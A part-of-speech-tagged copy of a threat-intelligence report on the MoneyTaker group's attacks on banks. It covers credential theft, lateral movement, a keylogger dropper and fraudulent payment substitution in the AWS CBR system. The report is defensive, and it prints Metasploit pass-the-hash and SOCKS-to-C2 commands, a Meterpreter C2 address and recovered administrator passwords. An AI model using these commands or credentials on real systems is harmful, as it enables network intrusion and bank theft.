pack NN
, ,
or CC
exploits NNS
designed VBN
to TO
bypass VB
the DT
UAC NNP
technology NN
. .

With IN
local JJ
administrator NN
privileges NNS
they PRP
can MD
use VB
the DT
Mimikatz NNP
program NN
, ,
which WDT
is VBZ
loaded VBN
into IN
the DT
memory NN
using VBG
Meterpreter NNP
, ,
to TO
extract VB
unencrypted JJ
Windows NNP
credentials NNS
. .

In IN
addition NN
to TO
the DT
standard JJ
modules NNS
from IN
the DT
Metasploit NNP
pack NN
, ,
the DT
following VBG
tools NNS
are VBP
used VBN
to TO
escalate VB
privileges NNS
: :
Name NN
MD5 NN
Type NN
ASLRSideChannelAttack.exe $
9a82aa5af19fa0a6167f87ee500856d53690c92c8c6449af54d8e5d33cf8bff4 CD
LPE NNP
Win10x64 NNP
cve.bat NN
cve.exe NN
7ff092853c15b51315414939c165ea9bce1f920d2d99e570d747ee7fc9fa734a CD
BAT NNP
LPE NNP
executor NN
98b6f9172ca273deef324f032a8e992b6e6ca3c6542449a48246b3646b6c8cb6 CD
cve-2016-7255 NN
cve-2016-7255.exe NN
5ec6a6c9a7233a7ff68d989d830a2249e94a2784e69d5c8a593d3345da14a6b5 CD
cve-2016-7255 NN
cve-2016-7255test.exe NN
df69966d721193e2315723dd71636b93cc76b38cfa046dce45d7aec4856f4bee NN
cve-2016-7255 NN
It PRP
is VBZ
interesting VBG
to TO
analyze VB
the DT
ASLRSideChannelAttack.exe NNP
file NN
. .

It PRP
was VBD
compiled VBN
on IN
October NNP
23 CD
, ,
2016 CD
based VBN
on IN
codes NNS
presented VBN
at IN
the DT
Russian JJ
conference NN
ZeroNights NNS
2016 CD
. .

The DT
codes NNS
are VBP
available JJ
online NN
at IN
https NN
: :
//github.com/IOActive/I-know-where-your-page- JJ
lives NNS
. .

13 CD
In IN
addition NN
, ,
they PRP
actively RB
searched VBD
for IN
passwords NNS
stored VBN
in IN
Active NNP
Directory NNP
group NN
policies NNS
by IN
exploiting VBG
the DT
MS14-025 NNP
vulnerability NN
and CC
the DT
corresponding JJ
Metasploit NNP
module NN
( (
post/windows/gather/ NN
credentials/gpp NN
) )
. .

After IN
receiving VBG
group NN
policy NN
files NNS
, ,
the DT
attacker NN
decrypted VBD
the DT
passwords NNS
that WDT
were VBD
stored VBN
there RB
and CC
used VBD
them PRP
on IN
other JJ
workstations NNS
. .

In IN
some DT
cases NNS
, ,
passwords NNS
of IN
bank NN
systems NNS
’ VBP
accounts NNS
granting VBG
local JJ
administrator NN
privileges NNS
were VBD
very RB
weak JJ
. .

Here RB
is VBZ
an DT
example NN
of IN
domain NN
administrator NN
passwords NNS
that WDT
attackers NNS
recovered VBD
: :
User NNP
name NN
Encrypted VBN
value NN
of IN
the DT
password NN
field NN
Decrypted VBN
password NN
Administrator NN
Uj80N3lMoEtnIXIP+dTzzBK/2/mALyumPkQaj9249KY NN
Wrongpassword1 NN
Administrator NN
n8rOHPvtmB1j24AV7EYclWS6DgQWaoQkfqzOZVlBLzI NN
System321 NN
Using VBG
the DT
Metasploit NNP
modules NNS
with IN
the DT
functionality NN
of IN
dumping VBG
Windows NNP
local JJ
users NNS
’ VBP
password JJ
hashes NNS
stored VBN
in IN
the DT
Security NNP
Accounts NNS
Manager NNP
( (
hashdump NN
or CC
smart_hashdump NN
modules NNS
) )
, ,
hackers NNS
received VBD
the DT
local JJ
administrator NN
’ NNP
s NN
NTLM NNP
hash NN
, ,
as RB
well RB
as IN
the DT
NTLM NNP
hash NN
and CC
unencrypted JJ
password NN
for IN
domain NN
users NNS
. .

Propagation NN
across IN
the DT
network NN
To TO
get VB
the DT
list NN
of IN
computers NNS
in IN
Active NNP
Directory NNP
, ,
hackers NNS
often RB
use VBP
a DT
PowerShell NNP
script NN
named VBN
allpc.ps1 NN
, ,
which WDT
was VBD
copied VBN
from IN
this DT
discussion NN
in IN
October NNP
2015 CD
: :
https NN
: :
//serverfault.com/questions/732681/export-simple-list-of-all- JJ
computers-in-multiple-ous-in-ad NN
To TO
propagate VB
across IN
the DT
network NN
, ,
hackers NNS
used VBD
a DT
legitimate JJ
tool NN
psexec NN
, ,
which WDT
is VBZ
typical JJ
for IN
network NN
administrators NNS
. .

This DT
tool NN
creates VBZ
a DT
local JJ
service NN
via IN
SMB/RPC NNP
protocol NN
, ,
then RB
executes VBZ
and CC
deletes NNS
it PRP
. .

In IN
the DT
service NN
properties NNS
, ,
the DT
required JJ
command NN
is VBZ
set VBN
to TO
start VB
. .

The DT
attacker NN
used VBD
two CD
methods NNS
to TO
distribute VB
the DT
payload NN
: :
they PRP
placed VBD
executable JJ
files NNS
in IN
the DT
network NN
folder NN
, ,
and CC
forced VBD
the DT
attacked JJ
computers NNS
to TO
start VB
them PRP
, ,
or CC
indicated VBD
the DT
shell NN
code NN
directly RB
in IN
the DT
service NN
start NN
line NN
. .

For IN
passwords NNS
that WDT
were VBD
received VBN
as IN
an DT
NTLM NNP
hash NN
and CC
were VBD
not RB
decrypted VBN
, ,
the DT
Pass-the-hash NNP
technique NN
was VBD
used VBN
, ,
which WDT
allows VBZ
using VBG
an DT
NTLM NNP
hash NN
for IN
authentication NN
without IN
password NN
. .

To TO
do VB
this DT
, ,
the DT
same JJ
legitimate JJ
Metasploit NNP
’ NNP
s VBD
psexec JJ
modules NNS
were VBD
used VBN
without IN
any DT
modification NN
. .

14 CD

use NN
auxiliary/admin/smb/psexec JJ
_ NN
command NN
set VBN
COMMAND NNP
start NN
\\\\10.1.5.35\\tmp\\msc7.exe NN
set NN
RHOSTS NNP
10.1.5.35 CD
set VBN
SMBUser NNP
Administrator NNP
set VBN
SMBPass NNP
aad3b435b51404eeaad3b435b51404ee:23cec95759ea5880 NN
adf1794f475c23cd NN
set VBN
SMBDomain NNP
WORKGROUP NNP
After IN
gaining VBG
access NN
to TO
new JJ
systems NNS
, ,
attackers NNS
repeated VBD
the DT
above-mentioned JJ
procedure NN
to TO
collect VB
passwords NNS
. .

Remote NNP
access NN
Until IN
October NNP
2017 CD
, ,
hackers NNS
remotely RB
accessed VBD
systems NNS
of IN
interest NN
using VBG
standard JJ
Metasploit NNP
tools NNS
, ,
as RB
well RB
as IN
legitimate JJ
remote NN
access NN
programs NNS
. .

On IN
hosts NNS
where WRB
Meterpreter NNP
was VBD
launched VBN
, ,
hackers NNS
set VBD
up RP
a DT
SOCKS NNP
proxy NN
server NN
, ,
which WDT
allowed VBD
them PRP
to TO
remotely RB
send VB
commands NNS
within IN
the DT
local JJ
network NN
. .

To TO
create VB
a DT
connection NN
via IN
SOCKS NNP
proxy NN
, ,
they PRP
primarily RB
used VBD
ports NNS
7080 CD
and CC
1808 CD
: :
use NN
auxiliary/server/socks4a NN
show NN
options NNS
set VBN
SRVHOST NNP
_ NNP
c2serverIP NN
_ NN
set VBN
SRVPORT NNP
7080 CD
In IN
addition NN
, ,
they PRP
actively RB
used VBD
various JJ
VNC NNP
clients NNS
such JJ
as IN
Fileless NN
VNC NNP
, ,
VNC NNP
, ,
UltraVNC NNP
and CC
TightVNC NNP
Portable NNP
versions NNS
x32 NN
and CC
x64 NN
. .

In IN
the DT
US NNP
, ,
they PRP
used VBD
the DT
LogMeIn NNP
Hamachi NNP
solution NN
for IN
remote NN
access NN
. .

In IN
one CD
incident NN
, ,
to TO
ensure VB
continuous JJ
remote JJ
access NN
, ,
hackers NNS
gained JJ
access NN
to TO
the DT
firewall NN
, ,
where WRB
they PRP
configured VBD
a DT
tunnel NN
to TO
the DT
C NNP
& CC
C NNP
server NN
. .

Also RB
, ,
to TO
secure VB
connections NNS
to TO
its PRP$
C NNP
& CC
C NNP
server NN
, ,
hackers NNS
established VBD
an DT
SSH NNP
tunnel NN
using VBG
a DT
legitimate JJ
tool NN
- :
Plink NN
. .

15 CD
05 CD
SPYING NN
ON RP
LEGITIMATE JJ
USERS NNS
To TO
conduct VB
a DT
successful JJ
attack NN
, ,
hackers NNS
need VBP
to TO
monitor VB
legitimate JJ
activity NN
of IN
the DT
victim NN
bank NN
’ NNP
s VBZ
users NNS
and CC
financial JJ
operators NNS
to TO
then RB
repeat NN
the DT
same JJ
actions NNS
. .

The DT
MoneyTaker NNP
group NN
uses VBZ
the DT
following JJ
tools NNS
to TO
spy VB
on IN
employees NNS
: :
• VB
A DT
legitimate JJ
tool NN
NirCmd NNP
• JJ
Self-developed NNP
tools NNS
- :
‘ NN
screenshotter NN
’ NNP
and CC
‘ NNP
keylogger NNP
’ NN
NirCmd NNP
is VBZ
a DT
small JJ
command-line JJ
utility NN
, ,
with IN
the DT
functionality NN
similar JJ
to TO
psexec VB
. .

It PRP
allows VBZ
hackers NNS
to TO
remotely RB
execute VB
various JJ
commands NNS
: :
write NN
and CC
delete JJ
values NNS
and CC
keys NNS
in IN
the DT
Registry NNP
, ,
write NN
values NNS
into IN
INI NNP
file NN
, ,
connect NN
to TO
a DT
VPN NNP
network NN
, ,
restart NN
windows NNS
or CC
shut RB
down RP
the DT
computer NN
, ,
change VBP
the DT
created/modified JJ
date NN
of IN
a DT
file NN
, ,
change NN
display NN
settings NNS
, ,
turn VB
off RP
the DT
monitor NN
, ,
and CC
many JJ
more JJR
. .

One CD
of IN
the DT
most RBS
important JJ
capabilities NNS
for IN
attackers NNS
is VBZ
taking VBG
screenshots NNS
. .

For IN
example NN
, ,
by IN
running VBG
the DT
following JJ
command NN
: :
nircmd.exe JJ
loop VBD
10 CD
60000 CD
savescreenshot JJ
c NNS
: :
\temp\ NN
scr~ JJ
$ $
currdate.MM JJ
_ NNP
dd NN
_ NNP
yyyy RB
$ $
-~ JJ
$ $
currtime.HH JJ
_ NNP
mm NN
_ NNP
ss VBD
$ $
.png NNS
10 CD
screenshots NNS
will MD
be VB
taken VBN
with IN
an DT
interval NN
of IN
60 CD
seconds NNS
. .

However RB
, ,
this DT
functionality NN
was VBD
not RB
enough RB
for IN
the DT
group NN
, ,
therefore RB
they PRP
created VBD
their PRP$
own JJ
unique NN
tools NNS
designed VBN
to TO
take VB
screenshots NNS
and CC
capture NN
keystrokes NNS
. .

Name NN
MD5 NN
Type NN
perfmon.exe NN
2049df4a5f92709bad14a7e2b8c0cfcb6ede2f71009cb3483892108 CD
e949800e6 NN
Dropper NNP
of IN
Keylogger/Screenshotter NNP
perfmonpe.exe NN
ff3c84266fdba3638b9fc1a41cab87cf4021eb531954343d1a328b30 NN
7b586ac6 CD
Dropper NNP
of IN
Keylogger/Screenshotter NNP
recycler.exe NN
xkey.exe NN
xkey_x86.dll NN
206aec8132cbb2497553b1f2c1c40733188929bad2feb0640e99474 CD
b327e564b NN
Dropper NNP
of IN
Keylogger/Screenshotter NNP
b2e02579cf0e9c2a57bff806b57d6b868d5d411264d38ff7ac7e6b4 NN
7d0d2a33d CD
Keylogger/Screenshotter NN
60e6652ae39ecd9314ba0e7936b41ca813737183c4eaa96dce0b4a CD
36a90375dd CD
Keylogger/Screenshotter NN
16 CD
These DT
programs NNS
are VBP
designed VBN
to TO
capture VB
keystrokes NNS
, ,
take VB
screenshots NNS
of IN
the DT
user NN
’ NNP
s NN
desktop NN
and CC
get VB
the DT
contents NNS
from IN
the DT
clipboard NN
. .

All PDT
this DT
data NN
can MD
be VB
stored VBN
in IN
a DT
file NN
of IN
the DT
temporary JJ
directory NN
. .

Dropper NN
This DT
is VBZ
an DT
NSIS-packed JJ
downloader NN
. .

Upon IN
its PRP$
launch NN
it PRP
creates VBZ
the DT
following VBG
files NNS
: :
% NN
Temp NNP
% NN
\datepicker-ru JJ
_ NN
RU.js NNP
% NN
Temp NNP
% NN
\LEJ NNP
% NN
2BPamplona CD
% NN
2BSanta.jpg CD
% NN
Temp NNP
% NN
\roknewsflash.css NN
% NN
Temp NNP
% NN
\fonts.css NN
% NN
Temp NNP
% NN
\addons.css NN
% NN
Temp NNP
% NN
\tracker.php NN
% NN
Temp NNP
% NN
\mJ8OS5lCf8xFQQiX4F1Ei.sNXbnF1xay NN
% NN
Temp NNP
% NN
\ NNP
< NNP
rnd NN
_ NNP
chars VBZ
> CD
.tmp\System.dll NN
The DT
dropper NN
twice RB
launches VBZ
its PRP$
own JJ
file NN
as IN
a DT
child NN
process NN
. .

It PRP
decrypts VBZ
the DT
data NN
buffer NN
, ,
which WDT
is VBZ
stored VBN
in IN
the DT
dropper NN
in IN
an DT
encrypted VBN
form NN
, ,
and CC
injects VBZ
it PRP
into IN
the DT
child NN
process NN
( (
which WDT
is VBZ
launched VBN
last JJ
) )
. .

That DT
is VBZ
how WRB
the DT
payload NN
is VBZ
started VBN
. .

Keylogger/Screenshotter NN
• IN
The DT
application NN
is VBZ
compiled VBN
in IN
Delphi NNP
. .

Its PRP$
main JJ
form NN
contains NNS
text JJ
field NN
components NNS
and CC
5 CD
timers NNS
. .

• NNS
Based VBN
on IN
the DT
names NNS
of IN
components NNS
in IN
Portuguese JJ
, ,
we PRP
assume VBP
that IN
either CC
its PRP$
author NN
is VBZ
Portuguese-speaking JJ
, ,
or CC
the DT
campaign NN
targets NNS
Portuguese-speaking JJ
countries NNS
( (
for IN
example NN
, ,
Brazil NNP
) )
or CC
the DT
code NN
is VBZ
based VBN
on IN
the DT
source NN
code NN
of IN
the DT
Portuguese JJ
program NN
. .

• JJ
Functions NNS
of IN
the DT
application NN
are VBP
executed VBN
once IN
the DT
timer NN
triggers NNS
( (
after IN
the DT
time NN
interval NN
, ,
which WDT
is VBZ
specified VBN
in IN
this DT
timer NN
as IN
the DT
interval NN
of IN
the DT
timer NN
operation NN
) )
. .

17 CD
Timer NN
name NN
Function NN
Status NN
at IN
the DT
time NN
of IN
launch NN
Timer NNP
's POS
triggering VBG
interval NN
Activity NN
of IN
the DT
triggered JJ
timer NN
InternetTimer NN
Timer NN
activating VBG
AtivatTimer NN
enabled VBN
10 CD
seconds NNS
Triggers NNS
the DT
activation NN
timer NN
KeyloggerTimer NNP
Keylogger NNP
timer NN
disabled JJ
1 CD
millisecond NN
EnviarTimer NN
Data NNP
export NN
timer NN
disabled JJ
5 CD
minutes NNS
AtivatTimer NN
Activation NNP
timer NN
disabled JJ
1 CD
millisecond NN
DesativatTimer NN
Deactivation NN
timer NN
disabled JJ
1 CD
millisecond NN
Activates VBZ
the DT
functions NNS
of IN
the DT
keylogger NN
. .

Described VBN
in IN
detail NN
below NN
. .

Takes NNP
screenshots NNS
, ,
dumps NNS
all PDT
the DT
collected VBN
data NN
into IN
a DT
file NN
. .

Will MD
be VB
described VBN
below IN
Triggers NNS
the DT
keylogger NN
timer NN
and CC
the DT
data NNS
export NN
timer NN
; :
disables VBZ
the DT
activation NN
timer NN
( (
itself PRP
) )
Triggers NNS
the DT
keylogger NN
timer NN
, ,
and CC
the DT
data NNS
export NN
timer NN
; :
disables VBZ
the DT
deactivation NN
timer NN
( (
itself PRP
) )
• JJ
Timers NNP
’ NNP
names NNS
mean VBP
that IN
one CD
of IN
them PRP
is VBZ
used VBN
to TO
activate VB
network NN
functions NNS
( (
InternetTimer NNP
) )
, ,
another DT
one CD
is VBZ
used VBN
to TO
send VB
data NNS
( (
EnviarTimer NNP
) )
. .

However RB
, ,
in IN
fact NN
they PRP
perform VBP
other JJ
activity NN
. .

Instead RB
of IN
activating VBG
the DT
network NN
functions NNS
, ,
the DT
« NNP
InternetTimer NNP
» NN
timer NN
simply RB
activates VBZ
another DT
timer NN
, ,
and CC
the DT
« NNP
EnviarTimer NNP
» NN
timer NN
( (
translated VBN
as IN
« NN
sending VBG
timer JJR
» NN
) )
captures VBZ
screenshots NNS
and CC
uploads IN
the DT
collected VBN
data NNS
to TO
a DT
file NN
in IN
a DT
temporary JJ
directory NN
. .

This DT
may MD
indicate VB
that IN
the DT
source NN
code NN
of IN
the DT
file NN
, ,
which WDT
was VBD
originally RB
written VBN
for IN
other JJ
purposes NNS
( (
including VBG
sending VBG
network NN
data NNS
) )
, ,
was VBD
then RB
slightly RB
modified VBN
. .

• NN
After IN
the DT
start NN
, ,
the DT
application NN
executes VBZ
the DT
TForm1 NNP
. .

FormCreate NNP
( (
) )
procedure NN
, ,
where WRB
it PRP
loads VBZ
the DT
necessary JJ
system NN
dynamic JJ
libraries NNS
into IN
the DT
address JJ
space NN
and CC
looks VBZ
for IN
the DT
addresses NNS
of IN
the DT
functions NNS
WinExec NNP
, ,
GetAsyncKeyState NNP
, ,
GetWindowTextA NNP
, ,
GetForegroundWindow NNP
KeyloggerTimer NNP
in IN
them PRP
. .

When WRB
the DT
timer NN
triggers NNS
, ,
it PRP
intercepts VBZ
keystrokes NNS
. .

It PRP
also RB
extracts VBZ
the DT
name NN
of IN
the DT
application NN
( (
the DT
window NN
title NN
) )
in IN
which WDT
the DT
key NN
was VBD
pressed VBN
and CC
the DT
date NN
/ JJ
time NN
of IN
pressing NN
. .

Below NNP
is VBZ
an DT
example NN
of IN
a DT
record NN
of IN
the DT
keylogger NN
log NN
. .

Bold JJ
marked VBN
are VBP
pressed VBN
keys NNS
or CC
dialog NN
box NN
titles NNS
in IN
which WDT
these DT
keys NNS
were VBD
entered VBN
[ JJ
F2 NNP
] NNP
[ NNP
F9 NNP
] NNP
< NNP
/textarea NNP
> NNP
< NNP
br NN
> NNP
< NNP
br NN
> NNP
< NNP
b NN
> NNP
< NNP
font VBD
color NN
= NN
« NNP
green JJ
» NNP
> NNP
[ NNP
Run NNP
- :
2:53:54 CD
- :
11.11.2017 CD
] JJ
< NNP
br NN
> NNP
< NNP
/b NNP
> NNP
< NNP
/font NNP
> NNP
< NNP
style NN
> NNP
textarea NN
{ (
width:100 NN
% NN
; :
height:7em NN
; :
} )
< FW
/style JJ
> NNP
< NNP
textarea VBZ
readonly RB
> JJ
some DT
_ NN
entered VBN
_ JJ
word NN
< NNP
/textarea NNP
> NNP
< NNP
br NN
> NNP
< NNP
br NN
> NNP
< NNP
b NN
> NNP
< NNP
font VBD
color NN
= NN
« NN
green JJ
» NNP
> NNP
[ NNP
OllyDbg NNP
- :
1.exe CD
- :
[ NN
CPU NNP
- :
main JJ
thread NN
, ,
module NN
1 CD
] SYM
- :
2:54:25 CD
- :
11.11.2017 CD
] JJ
< NNP
br NN
> NNP
< NNP
/b NNP
> NNP
< NNP
/font NNP
> NNP
< NNP
style NN
> NNP
textarea NN
{ (
width:100 NN
% NN
; :
height:7em NN
; :
} )
< FW
/style JJ
> NNP
< NNP
textarea VBZ
readonly RB
> JJ
18 CD
• IN
The DT
keylogger NN
records VBZ
the DT
results NNS
of IN
the DT
interception NN
to TO
the DT
TForm1.Memo1 NNP
object VBP
located VBN
on IN
the DT
application NN
’ NNP
s NN
main JJ
form NN
. .

From IN
here RB
data NNS
can MD
be VB
obtained VBN
for IN
further JJ
recording NN
to TO
a DT
file NN
in IN
a DT
temporary JJ
directory NN
. .

• JJ
EnviaTimer NNP
. .

Using VBG
the DT
API NNP
function NN
GetClipboardData NNP
( (
) )
it PRP
can MD
intercept IN
the DT
contents NNS
of IN
the DT
clipboard NN
• VB
The DT
anti-emulation NN
function NN
is VBZ
implemented VBN
in IN
the DT
timer NN
code NN
to TO
bypass VB
antivirus NN
and CC
automated JJ
sample NN
analysis NN
by IN
calling VBG
the DT
ValidateName NNP
( (
) )
function NN
. .

Purportedly RB
, ,
this DT
method NN
of IN
anti-emulation NN
was VBD
copied VBN
from IN
a DT
public JJ
Russian NN
speaking VBG
source NN
( (
the DT
forum NN
https NN
: :
//fuckav.ru/showpost NN
. .

php NN
? .
p=109096 NN
& CC
postcount=63 NN
) )
and CC
was VBD
implemented VBN
with IN
an DT
error NN
, ,
due JJ
to TO
which WDT
the DT
functions NNS
of IN
taking VBG
screenshots NNS
and CC
writing VBG
data NNS
to TO
a DT
file NN
( (
which WDT
is VBZ
located VBN
in IN
code NN
after IN
checking VBG
for IN
emulation NN
) )
may MD
not RB
be VB
executed VBN
. .

• NN
It PRP
takes VBZ
a DT
screenshot NN
of IN
the DT
desktop NN
, ,
compresses VBZ
it PRP
into IN
JPEG NNP
and CC
encodes NNS
in IN
base64 NN
• NN
It PRP
creates VBZ
a DT
file NN
with IN
the DT
name NN
“ NNP
% NN
Temp NNP
% NN
\perflog1.tmp NNP
” NN
Example NN
of IN
the DT
contents NNS
of IN
the DT
“ NNP
% NN
Temp NNP
% NN
\ NN
perflog1.tmp NN
” NN
file NN
collected VBN
by IN
keylogger NN
and CC
screenshotter NN
• NN
Network NNP
communications NNS
used VBD
to TO
send VB
collected VBN
data NNS
have VBP
not RB
been VBN
detected VBN
in IN
the DT
analyzed JJ
file NN
. .

19 CD
06 CD
ATTACK NN
ON NNP
AWS NNP
CBR NNP
In IN
August NNP
2016 CD
hackers NNS
successfully RB
infiltrated VBD
the DT
network NN
of IN
a DT
Russian JJ
bank NN
. .

They PRP
used VBD
an DT
automated JJ
system NN
to TO
steal VB
money NN
through IN
the DT
AWS NNP
CBR NNP
( (
Automated NNP
Work NNP
Station NNP
Client NNP
of IN
the DT
Russian JJ
Central NNP
Bank NNP
) )
, ,
an DT
interbank NN
fund NN
transfer NN
system NN
. .

Name NN
main.exe NN
igfxserv.exe NN
xml.exe NN
ed.exe NN
txt.exe NN
MD5 NN
Type NN
D57608F6DB9045752165EAF93452D57F NN
Main NNP
module NN
A70F905266F3D57B73B1D8A265286FD5 NN
Module NN
used VBN
to TO
substitute VB
payment NN
messages NNS
92B03E123B2D97B8E8E274224273EC5E CD
Module NN
used VBN
to TO
hide VB
fraudulent JJ
transfers NNS
Module NN
used VBN
to TO
work VB
with IN
temporary JJ
files NNS
arsm32.exe NN
A70F905266F3D57B73B1D8A265286FD5 NN
UltraVNC NN
hostsec64.exe NN
92B03E123B2D97B8E8E274224273EC5E CD
VNC NNP
client NN
hostsec32.exe NN
VNC NNP
client NN
empty32.exe NN
A70F905266F3D57B73B1D8A265286FD5 NN
VNC NNP
client NN
1E4499560CDD2F69ECBED8761CAC7272 CD
8B1B5D1C8430EC16735E5DED94112B18 CD
Meterpreter NN
https NN
: :
//185.86.149.140/Y0DNA:443 NN
09A7F9813F6DE28F2D7BCBA032390662 CD
Meterpreter NN
B5450C8553DEF4996426AB46996B2E55 NN
185.86.149.140 CD
Meterpreter NN
Meterpreter NN
4672E624C5210A523AA0A0B56DB677B6 CD
Keylogger NNP
stores NNS
logs NNS
in IN
snmp.dat NN
test64.exe NN
test32.exe NN
btcp32.exe NN
load64.exe NN
plink.exe NN
Far.exe NN
4.bat CD
nbt.EXE NN
hkcmd.exe NN
at1.bat NN
startdll32.exe NN
qpd.exe NN
20 CD
Having VBG
accessed VBN
the DT
bank NN
’ NNP
s VBZ
internal JJ
network NN
, ,
hackers NNS
downloaded VBD
a DT
modular JJ
tool NN
called VBN
Moneytaker NNP
v5.0 NN
to TO
the DT
server NN
of IN
the DT
AWS NNP
CBR NNP
. .

This DT
is VBZ
the DT
tool NN
which WDT
the DT
group NN
has VBZ
been VBN
named VBN
after IN
. .

Its PRP$
main JJ
module NN
is VBZ
located VBN
in IN
the DT
directory NN
“ NNP
c NN
: :
\intel\logs\1\mt\bin JJ
” NN
and CC
has VBZ
the DT
name NN
“ NNP
main.exe NN
” NN
or CC
“ VB
igfxserv.exe JJ
” NN
. .

This DT
is VBZ
a DT
program NN
without IN
network NN
communications NNS
and CC
it PRP
should MD
run VB
with IN
the DT
main JJ
configuration NN
file NN
specified VBN
as IN
an DT
argument NN
. .

It PRP
is VBZ
initialized VBN
according VBG
to TO
the DT
configuration NN
file NN
, ,
then RB
it PRP
checks VBZ
the DT
presence NN
of IN
the DT
modules NNS
specified VBN
in IN
the DT
configuration NN
file NN
and CC
backups NNS
of IN
certain JJ
AWS NNP
CBR NNP
directories NNS
. .

Further RB
through IN
the DT
report NN
, ,
in IN
the DT
behavior NN
description NN
which WDT
depends NNS
on IN
the DT
configuration NN
file NN
, ,
the DT
name NN
of IN
the DT
argument NN
will MD
be VB
specified VBN
. .

MAIN NNP
MODULE NNP
– NNP
“ NNP
MAIN.EXE NNP
” NNP
OR NNP
“ JJ
IGFXSERV.EXE NNP
” NN
The DT
main JJ
module NN
is VBZ
started VBN
by IN
passing VBG
the DT
main JJ
configuration NN
file NN
“ ''
c NNS
: :
\intel\logs\1\mt\config\main-config.txt JJ
” NN
as IN
an DT
argument NN
. .

The DT
module NN
logs NNS
all DT
events NNS
to TO
the DT
“ JJ
Main-Logfile JJ
” NN
file NN
. .

Upon IN
startup NN
, ,
the DT
module NN
looks VBZ
for IN
XML NNP
, ,
ED NNP
and CC
TXT NNP
modules NNS
specified VBN
in IN
the DT
config NN
file NN
as IN
“ NNP
XmlBin NNP
” NNP
“ NNP
EdBin NNP
” NNP
and CC
“ NNP
TxtBin NNP
” NNP
, ,
respectively RB
. .

They PRP
also RB
search NN
for IN
their PRP$
configuration NN
files NNS
, ,
the DT
parameters NNS
: :
“ NN
XmlCfg NNP
” NN
“ JJ
EdCfg NNP
” NNP
and CC
“ NNP
TxtCfg NNP
” NNP
. .

If IN
configuration NN
files NNS
of IN
modules NNS
do VBP
not RB
exist VB
as IN
separate JJ
files NNS
, ,
their PRP$
settings NNS
are VBP
stored VBN
together RB
in IN
the DT
“ JJ
main- NN
config.txt NN
” NN
file NN
. .

The DT
module NN
reads VBZ
the DT
“ NNP
Directory NNP
” NNP
“ NNP
Backup NNP
” NNP
“ NNP
Recursive NNP
” NN
“ JJ
Action NNP
” NNP
parameters NNS
and CC
uses VBZ
the DT
WINAPI NNP
function NN
called VBD
ReadDirectoryChangesW NNP
( (
) )
to TO
monitor VB
the DT
files NNS
appearing VBG
in IN
the DT
directories NNS
specified VBN
in IN
the DT
“ NNP
Directory NNP
” NNP
. .

Directory NN
name NN
Designation NN
in IN
AWS NNP
CBR NNP
% NN
АРМ JJ
КБР CD
% NN
\exg\chk NN
Decrypted VBN
, ,
unpacked JJ
and CC
verified JJ
electronic JJ
messages NNS
% NN
АРМ JJ
КБР CD
% NN
\exq\cli NN
Received VBN
messages NNS
from IN
AWS NNP
CBR NNP
formed VBD
according VBG
to TO
the DT
unified JJ
formats NNS
of IN
electronic JJ
messages NNS
of IN
the DT
Central NNP
Bank NNP
of IN
Russia NNP
% NN
АРМ JJ
КБР CD
% NN
\tmp NN
Temporary JJ
files NNS
When WRB
a DT
new JJ
file NN
appears VBZ
, ,
the DT
corresponding JJ
module NN
is VBZ
started VBN
( (
ED NNP
for IN
the DT
“ NNP
chk NN
” NNP
directory NN
, ,
XML NNP
for IN
the DT
“ NNP
cli NN
” NNP
directory NN
and CC
TXT NNP
for IN
the DT
“ JJ
tmp NN
” NNP
directory NN
) )
and CC
copied VBN
to TO
the DT
directory NN
specified VBN
as IN
“ NNP
Backup NNP
” NNP
. .

21 CD
AWS NNP
CBR NNP
operator NN
ED101 NN
A DT
legitimate JJ
payment NN
order NN
issued VBN
by IN
AWS NNP
CBR NNP
operator NN
XML.EXE NN
substitutes NNS
original JJ
payment NN
details NNS
with IN
fraudulent JJ
ones NNS
% NN
ARM_CBR NNP
% NN
\exg\cli NN
% NN
ARM_CBR NNP
% NN
\exg\chk NN
AWS NNP
CBR NNP
validation NN
component NN
( (
checks VB
the DT
correctness NN
of IN
the DT
payment NN
message NN
) )
ED.EXE NN
restores NNS
original JJ
payment NN
details NNS
AWS NNP
CBR NNP
operator NN
receives VBZ
the DT
response NN
as IN
if IN
the DT
payment NN
details NNS
were VBD
the DT
initial JJ
ones NNS
, ,
without IN
suspecting VBG
the DT
theft NN
. .

CBR NN
Payment JJ
order NN
with IN
the DT
fraudulent JJ
payment NN
details NNS
is VBZ
sent VBN
to TO
the DT
Central NNP
Bank NNP
of IN
Russia NNP
AUTOMATED NNP
REPLACEMENT NNP
MODULE NNP
– NN
“ JJ
XML.EXE NNP
” NN
The DT
main JJ
module NN
starts VBZ
the DT
“ NNP
xml.exe NNP
” NNP
file NN
, ,
passing VBG
the DT
name NN
of IN
a DT
new JJ
file NN
in IN
the DT
“ NN
% NN
АРМ JJ
КБР CD
% NN
\exq\cli CC
” JJ
directory NN
and CC
the DT
config NN
file NN
. .

The DT
automated JJ
replacement NN
module NN
records NNS
detailed VBN
logs NNS
and CC
writes VBZ
them PRP
to TO
a DT
file NN
specified VBN
in IN
the DT
configuration NN
as IN
“ JJ
Xml-Logfile JJ
” NN
Electronic JJ
messages NNS
generated VBN
by IN
the DT
AWS NNP
CBR NNP
are VBP
placed VBN
in IN
the DT
“ NN
% NN
АРМ JJ
КБР CD
% NN
\exq\cli CC
” JJ
directory NN
for IN
further JJ
processing NN
by IN
the DT
gateway NN
component NN
“ NNP
Input NNP
control NN
” NNP
. .

It PRP
is VBZ
at IN
this DT
point NN
that IN
the DT
module NN
checks VBZ
the DT
xml NN
file NN
for IN
validity NN
and CC
determines VBZ
whether IN
the DT
electronic JJ
message NN
file NN
is VBZ
a DT
payment NN
order NN
( (
the DT
“ NN
ED101 NNP
” NNP
type NN
) )
. .

22 CD
For IN
ED101 NNP
, ,
the DT
module NN
scans NNS
for IN
the DT
fields NNS
“ VBP
Purpose NNP
” NNP
, ,
“ NNP
Payer NNP
” NNP
, ,
“ JJ
PersonalAcc NNP
” NNP
, ,
“ NNP
Payee NNP
” NNP
, ,
“ NNP
Name NNP
” NNP
, ,
“ NNP
Bank NNP
BIC NNP
” NNP
, ,
“ NNP
CorrespAcc NNP
” NNP
, ,
“ NNP
KPP NNP
” NNP
, ,
“ JJ
INN NNP
” NNP
, ,
“ NNP
SUM NNP
” NNP
, ,
“ NNP
AccDocNo NNP
” NNP
. .

Then RB
it PRP
reads VBZ
the DT
file NN
with IN
the DT
fraudsters NNS
’ VBP
payment NN
details NNS
- :
“ CD
Xml- NN
Workfile NNP
” NN
. .

The DT
following JJ
fields NNS
are VBP
specified VBN
: :
” JJ
name NN
” NNP
, ,
” NNP
id NN
” NNP
, ,
” NNP
acc VBZ
” CD
, ,
“ JJ
inn NN
